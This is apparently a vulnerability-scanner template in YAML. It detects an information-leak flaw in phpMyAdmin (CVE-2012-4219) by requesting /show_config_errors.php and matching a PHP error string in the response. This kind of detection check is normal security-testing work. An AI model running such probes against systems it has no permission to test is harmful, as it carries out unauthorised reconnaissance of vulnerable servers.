name: poc-yaml-phpmyadmin-cve-2012-4219-info-leak
binding: c3f15265-5764-4a63-9fa1-8376216e9b0b
manual: true
detail:
    links:
        - https://www.securityfocus.com/bid/55057
    vulnerability:
        id: CT-131732
        level: low
transport: http
rules:
    r0:
        request:
            cache: true
            method: GET
            path: /show_config_errors.php
        expression: response.body.bcontains(b"Call to undefined function PMA_no_cache_header")
expression: r0()
